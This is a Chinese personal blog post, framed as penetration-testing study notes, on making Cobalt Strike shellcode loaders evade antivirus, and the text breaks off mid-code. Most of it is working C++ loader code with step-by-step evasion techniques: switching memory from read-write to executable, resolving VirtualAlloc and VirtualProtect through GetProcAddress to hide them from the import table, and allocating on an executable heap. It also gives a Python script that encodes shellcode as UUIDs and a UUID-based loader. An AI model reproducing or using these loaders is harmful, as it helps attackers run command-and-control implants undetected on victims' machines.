<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="1y0ng" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      恶意代码逃逸学习 
      
      
      |
    
     1y0ng&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon2.png">
    <link rel="icon" href="/images/favicon2.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="1y0ng's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/favicon2.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">1y0ng</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">恶意代码逃逸学习</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2023-06-15 23:25:43
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%85%8D%E6%9D%80/" title="免杀">
                    #免杀
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <p>在渗透的过程中会经常遇到对方机器安装了杀软的情况，这时就需要用到免杀技术，之前钓鱼邮件中提到的免杀是用GO写的，但我觉得这种东西还是更靠近计算机底层为好，正好这几天看了<a target="_blank" rel="noopener" href="https://payloads.online">倾旋大佬的博客</a>，对于用c++来实现恶意代码逃逸学到了很多，特此记录</p>
<h1 id="简单的加载shellcode">简单的加载shellcode</h1>
<p>首先我们要让cobalt strike生成的shellcode运行起来一共就三个步骤</p>
<ol>
<li>申请计算机内存</li>
<li>将shellcode加载进内存</li>
<li>执行这一段内存</li>
</ol>
<p>上面三个步骤对应的代码为：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="comment">/* length: 891 bytes */</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b......&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="type">int</span> size = <span class="built_in">sizeof</span>(buf);</span><br><span class="line">    <span class="comment">//申请计算机内存</span></span><br><span class="line">	LPVOID exec = <span class="built_in">VirtualAlloc</span>(<span class="number">0</span>, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line">    <span class="comment">//将shellcode加载进内存</span></span><br><span class="line">	<span class="built_in">RtlMoveMemory</span>(exec, buf, size);</span><br><span class="line">    <span class="comment">//执行这一段内存</span></span><br><span class="line">	((<span class="built_in">void</span>(*)())exec)();</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>将以上代码生成的exe直接运行就可以上线CS了，但如果有杀软的话就会直接报毒</p>
<p><img src="image-20230615154428359.png" alt="image-20230615154428359"></p>
<p>针对这一情况，我们将采取一系列的措施来绕过</p>
<h1 id="免杀操作">免杀操作</h1>
<h2 id="申请可读写内存页">申请可读写内存页</h2>
<p>杀软对于<code>可执行内存页</code>的申请监控是非常严格的，所以我们可以先申请一个普通的<code>可读写内存页</code>，再通过VirtualProtect改变它的属性为可执行，代码如下</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="comment">/* length: 891 bytes */</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b......&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">//内存保护属性</span></span><br><span class="line">	DWORD oldProtect;</span><br><span class="line">	<span class="type">int</span> size = <span class="built_in">sizeof</span>(buf);</span><br><span class="line">    <span class="comment">//申请普通的可读写的内存页</span></span><br><span class="line">	LPVOID exec = <span class="built_in">VirtualAlloc</span>(<span class="number">0</span>, size, MEM_COMMIT, PAGE_READWRITE);</span><br><span class="line">	<span class="built_in">RtlMoveMemory</span>(exec, buf, size);</span><br><span class="line">    <span class="comment">//改变为可执行</span></span><br><span class="line">	<span class="built_in">VirtualProtect</span>(exec, size, PAGE_EXECUTE, &amp;oldProtect);</span><br><span class="line">	((<span class="built_in">void</span>(*)())exec)();</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="修改导入地址表">修改导入地址表</h2>
<p>在Windows操作系统中，当可执行文件或动态链接库（DLL）被加载时，系统需要知道它们所依赖的其他DLL中的函数的地址。这些地址被存储在<code>导入地址表</code>（Import Address  Table，简称IAT）中。IAT是一个由系统自动创建和维护的数据结构，它包含了导入模块中所有需要从其他模块中引用的函数的地址。</p>
<p>当一个模块被加载时，系统会根据该模块的导入描述符中的信息，为IAT中的每个导入函数填充正确的地址。这个过程被称为导入解析。如果一个模块依赖的DLL没有被加载，或者被加载但是没有导出所需的函数，导入解析就会失败，并且模块无法正常工作。</p>
<p>我们可以通过<code>peview</code>来查看导入表</p>
<p><img src="image-20230615162118302.png" alt="image-20230615162118302"></p>
<p>而杀软针对导入表也有自己的判断逻辑，当发现了<code>VirtualAlloc</code>、<code>VirtualProtect</code>等敏感函数在导入表中时，会判断该文件为高危文件</p>
<p>我们可以使用<code>GetProcAddress</code>函数来获取函数地址</p>
<p><code>GetProcAddress</code>是Windows API中的一个函数，它用于从动态链接库（DLL）中获取一个导出函数的地址。在Windows操作系统中，动态链接库是一种常见的代码共享机制，许多应用程序和系统组件都依赖于DLL中的函数。<code>GetProcAddress</code>函数可以让程序在运行时动态地链接到DLL中的函数，而不必在编译时将DLL中的函数链接到程序中。</p>
<p><code>GetProcAddress</code>函数的原型如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FARPROC GetProcAddress(</span><br><span class="line">  HMODULE hModule,  // DLL模块句柄</span><br><span class="line">  LPCSTR lpProcName // 导出函数名</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
<p>其中，<code>hModule</code>参数是DLL模块的句柄，可以使用<code>GetModuleHandle</code>函数加载DLL并获取该句柄；<code>lpProcName</code>参数是导出函数的名称，可以是一个字符指针，也可以是一个整数值，用于表示函数的序号。</p>
<p>首先是VirtualAlloc方法：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 声明指向 VirtualAlloc 函数的指针</span></span><br><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">LPVOID</span><span class="params">(WINAPI* LPVirtualAlloc)</span><span class="params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 初始化指针</span></span><br><span class="line">LPVirtualAlloc myVirtualAlloc = (LPVirtualAlloc)<span class="built_in">GetProcAddress</span>(<span class="built_in">GetModuleHandle</span>(<span class="string">&quot;kernel32.dll&quot;</span>), <span class="string">&quot;VirtualAlloc&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>同理VirtualProtect方法：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 声明指向 VirtualProtect 函数的指针</span></span><br><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">BOOL</span><span class="params">(WINAPI* LPVirtualProtect)</span><span class="params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 初始化指针</span></span><br><span class="line">LPVirtualProtect myVirtualProtect = (LPVirtualProtect)<span class="built_in">GetProcAddress</span>(<span class="built_in">GetModuleHandle</span>(<span class="string">&quot;kernel32.dll&quot;</span>), <span class="string">&quot;VirtualProtect&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>故代码转变为：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="comment">/* length: 891 bytes */</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b......&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">LPVOID</span><span class="params">(WINAPI* LPVirtualAlloc)</span><span class="params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">BOOL</span><span class="params">(WINAPI* LPVirtualProtect)</span><span class="params">(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	DWORD oldProtect;</span><br><span class="line">	LPVirtualAlloc myVirtualAlloc = (LPVirtualAlloc)<span class="built_in">GetProcAddress</span>(<span class="built_in">GetModuleHandle</span>(<span class="built_in">TEXT</span>(<span class="string">&quot;kernel32.dll&quot;</span>)), <span class="string">&quot;VirtualAlloc&quot;</span>);</span><br><span class="line">	LPVirtualProtect myVirtualProtect = (LPVirtualProtect)<span class="built_in">GetProcAddress</span>(<span class="built_in">GetModuleHandle</span>(<span class="built_in">TEXT</span>(<span class="string">&quot;kernel32.dll&quot;</span>)), <span class="string">&quot;VirtualProtect&quot;</span>);</span><br><span class="line">	<span class="type">int</span> size = <span class="built_in">sizeof</span>(buf);</span><br><span class="line">	LPVOID exec = <span class="built_in">myVirtualAlloc</span>(<span class="number">0</span>, size, MEM_COMMIT, PAGE_READWRITE);</span><br><span class="line">	<span class="built_in">RtlMoveMemory</span>(exec, buf, size);</span><br><span class="line">	<span class="built_in">myVirtualProtect</span>(exec, size, PAGE_EXECUTE, &amp;oldProtect);</span><br><span class="line">	((<span class="built_in">void</span>(*)())exec)();</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>此时用<code>peveiw</code>查看导入表发现已经不见<code>VirtualAlloc</code>和<code>VirtualProtect</code>了</p>
<p><img src="image-20230615191736134.png" alt="image-20230615191736134"></p>
<p>虽然导入表中已经没有<code>VirtualAlloc</code>了，但依赖于其他技术，杀软还是能检测到代码中使用了<code>VirtualAlloc</code>，也依旧还是会报毒</p>
<h2 id="利用HeapCreate替代VirtualAlloc">利用HeapCreate替代VirtualAlloc</h2>
<p><code>HeapCreate</code> 是 Windows API 中的一个函数，用于创建一个新的堆。函数原型如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HANDLE <span class="title">HeapCreate</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">  DWORD  flOptions,</span></span></span><br><span class="line"><span class="params"><span class="function">  SIZE_T dwInitialSize,</span></span></span><br><span class="line"><span class="params"><span class="function">  SIZE_T dwMaximumSize</span></span></span><br><span class="line"><span class="params"><span class="function">)</span></span>;</span><br></pre></td></tr></table></figure>
<p>参数说明：</p>
<ul>
<li><code>flOptions</code>：是一个控制堆的标志位，可以是 <code>HEAP_GENERATE_EXCEPTIONS</code>、<code>HEAP_NO_SERIALIZE</code>、<code>HEAP_ZERO_MEMORY</code> 或它们的组合。</li>
<li><code>dwInitialSize</code>：指定堆的初始大小，单位为字节。</li>
<li><code>dwMaximumSize</code>：指定堆的最大大小，如果为 0，则表示堆的大小没有限制。</li>
</ul>
<p>则原来的<code>LPVOID exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</code>可以用以下代码替代:</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 创建一个堆，设置 HEAP_CREATE_ENABLE_EXECUTE 和 HEAP_ZERO_MEMORY 标志位</span></span><br><span class="line">HANDLE hHeap = <span class="built_in">HeapCreate</span>(HEAP_CREATE_ENABLE_EXECUTE | HEAP_ZERO_MEMORY, <span class="number">0</span>, size);</span><br><span class="line"><span class="comment">// 在堆中分配内存，并将 shellcode 拷贝到分配的内存中</span></span><br><span class="line">PVOID exec = <span class="built_in">HeapAlloc</span>(hHeap, <span class="number">0</span>, <span class="built_in">sizeof</span>(buf));</span><br></pre></td></tr></table></figure>
<p>故整体代码为：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="comment">/* length: 891 bytes */</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">char</span> buf[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b......&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="type">int</span> size = <span class="built_in">sizeof</span>(buf);</span><br><span class="line">	<span class="comment">// 创建一个堆，设置 HEAP_CREATE_ENABLE_EXECUTE 和 HEAP_ZERO_MEMORY 标志位</span></span><br><span class="line">	HANDLE hHeap = <span class="built_in">HeapCreate</span>(HEAP_CREATE_ENABLE_EXECUTE | HEAP_ZERO_MEMORY, <span class="number">0</span>, size);</span><br><span class="line">	<span class="comment">// 在堆中分配内存，并将 shellcode 拷贝到分配的内存中</span></span><br><span class="line">	PVOID exec = <span class="built_in">HeapAlloc</span>(hHeap, <span class="number">0</span>, size);</span><br><span class="line">	<span class="built_in">RtlMoveMemory</span>(exec, buf, size);</span><br><span class="line">	((<span class="built_in">void</span>(*)())exec)();</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使用<code>HeapCreate</code>可以躲避杀软对于<code>VirtualAlloc</code>的”追杀“</p>
<p>但这样的exe还是会被杀，因为buf中的静态shellcode太明显了，我们需要对shellcode进行加密</p>
<h2 id="shellcode加密">shellcode加密</h2>
<p>要说起shellcode加密方法，那可太多了，之前钓鱼用的<code>异或+base64</code>可以尝试，同时倾旋大佬提到的<code>UUID编码</code>也是一个不错的方法</p>
<p><code>UUID (通用唯一标识符) </code>是一个用于标识信息的 128 位数字，它可以保证在分布式计算环境中的唯一性。在 C/C++ 中，UUID  结构体通常被定义为一个包含 16 个字节的无符号字符数组，可以使用 Windows API 函数来生成 UUID 或将字符串转换为 UUID。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// UUID 结构体</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">_UUID</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> Data[<span class="number">16</span>];</span><br><span class="line">&#125; UUID;</span><br></pre></td></tr></table></figure>
<p>在 Windows 操作系统中，可以使用命令行工具 <code>wmic</code> 来查看系统的 UUID，命令为 <code>wmic csproduct get UUID</code>。</p>
<p><img src="image-20230615205238426.png" alt="image-20230615205238426"></p>
<p>我们可以使用python加密脚本来将生成的bin文件进行uuid加密</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> uuid <span class="keyword">import</span> UUID  <span class="comment"># 导入 Python 内置的 UUID 类</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># Usage: python3 binToUUIDs.py shellcode.bin [--print]</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">  ____  _    _______    _    _ _    _ _____ _____       </span></span><br><span class="line"><span class="string"> |  _ \(_)  |__   __|  | |  | | |  | |_   _|  __ \      </span></span><br><span class="line"><span class="string"> | |_) |_ _ __ | | ___ | |  | | |  | | | | | |  | |___  </span></span><br><span class="line"><span class="string"> |  _ &lt;| | &#x27;_ \| |/ _ \| |  | | |  | | | | | |  | / __| </span></span><br><span class="line"><span class="string"> | |_) | | | | | | (_) | |__| | |__| |_| |_| |__| \__ \ </span></span><br><span class="line"><span class="string"> |____/|_|_| |_|_|\___/ \____/ \____/|_____|_____/|___/</span></span><br><span class="line"><span class="string">\n&quot;&quot;&quot;</span>)</span><br><span class="line"><span class="comment"># 打印程序标题，使用了 ASCII 艺术字</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(sys.argv[<span class="number">1</span>], <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:  <span class="comment"># 打开二进制文件，以二进制模式读取</span></span><br><span class="line">    <span class="built_in">bin</span> = f.read()  <span class="comment"># 读取文件内容</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &gt; <span class="number">2</span> <span class="keyword">and</span> sys.argv[<span class="number">2</span>] == <span class="string">&quot;--print&quot;</span>:</span><br><span class="line">    outputMapping = <span class="literal">True</span>  <span class="comment"># 如果命令行参数中有 &quot;--print&quot;，则输出转换前后的映射关系</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    outputMapping = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">0</span>  <span class="comment"># 偏移量初始化为 0</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Length of shellcode: &#123;&#125; bytes\n&quot;</span>.<span class="built_in">format</span>(<span class="built_in">len</span>(<span class="built_in">bin</span>)))  <span class="comment"># 打印 shellcode 的长度</span></span><br><span class="line"></span><br><span class="line">out = <span class="string">&quot;&quot;</span>  <span class="comment"># 初始化输出字符串</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(offset &lt; <span class="built_in">len</span>(<span class="built_in">bin</span>)):  <span class="comment"># 遍历 shellcode 中的每 16 个字节</span></span><br><span class="line">    countOfBytesToConvert = <span class="built_in">len</span>(<span class="built_in">bin</span>[offset:])  <span class="comment"># 计算还剩多少字节需要转换</span></span><br><span class="line">    <span class="keyword">if</span> countOfBytesToConvert &lt; <span class="number">16</span>:  <span class="comment"># 如果不足 16 个字节</span></span><br><span class="line">        ZerosToAdd = <span class="number">16</span> - countOfBytesToConvert  <span class="comment"># 计算需要补多少个 0</span></span><br><span class="line">        byteString = <span class="built_in">bin</span>[offset:] + (<span class="string">b&#x27;\x00&#x27;</span>* ZerosToAdd)  <span class="comment"># 在末尾补 0</span></span><br><span class="line">        uuid = UUID(bytes_le=byteString)  <span class="comment"># 将 byteString 转换成 UUID</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        byteString = <span class="built_in">bin</span>[offset:offset+<span class="number">16</span>]  <span class="comment"># 取出 16 个字节</span></span><br><span class="line">        uuid = UUID(bytes_le=byteString)  <span class="comment"># 将 byteString 转换成 UUID</span></span><br><span class="line">    offset+=<span class="number">16</span>  <span class="comment"># 偏移量加 16</span></span><br><span class="line"></span><br><span class="line">    out += <span class="string">&quot;\&quot;&#123;&#125;\&quot;,\n&quot;</span>.<span class="built_in">format</span>(uuid)  <span class="comment"># 将 UUID 添加到 out 中</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> outputMapping:  <span class="comment"># 如果需要输出映射关系</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;&#123;&#125; -&gt; &#123;&#125;&quot;</span>.<span class="built_in">format</span>(byteString, uuid))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(sys.argv[<span class="number">1</span>] + <span class="string">&quot;UUIDs&quot;</span>, <span class="string">&quot;w&quot;</span>) <span class="keyword">as</span> f:  <span class="comment"># 将转换后的 UUID 写入到文件中</span></span><br><span class="line">    f.write(out)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Outputted to: &#123;&#125;&quot;</span>.<span class="built_in">format</span>(sys.argv[<span class="number">1</span>] + <span class="string">&quot;UUIDs&quot;</span>))  <span class="comment"># 打印输出文件的路径</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="image-20230615220751829.png" alt="image-20230615220751829"></p>
<p>然后将加密的shellcode加载到内存里去</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;rpc.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(lib,<span class="string">&quot;Rpcrt4.lib&quot;</span>)</span></span><br><span class="line"><span class="comment">//不弹出交互端口</span></span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(linker, <span class="string">&quot;/subsystem:\&quot;Windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span>)</span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"><span class="type">const</span> <span class="type">char</span>* buf[] = &#123;</span><br><span class="line"><span class="string">&quot;e48348fc-e8f0-00c8-0000-415141505251&quot;</span>,</span><br><span class="line"><span class="string">&quot;d2314856-4865-528b-6048-8b5218488b52&quot;</span>,</span><br><span class="line"><span class="string">&quot;728b4820-4850-b70f-4a4a-4d31c94831c0&quot;</span>,</span><br><span class="line"><span class="string">&quot;7c613cac-2c02-4120-c1c9-0d4101c1e2ed&quot;</span>,</span><br><span class="line"><span class="string">&quot;……&quot;</span>,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">	<span class="comment">// 获取数组 buf 中元素个数</span></span><br><span class="line">	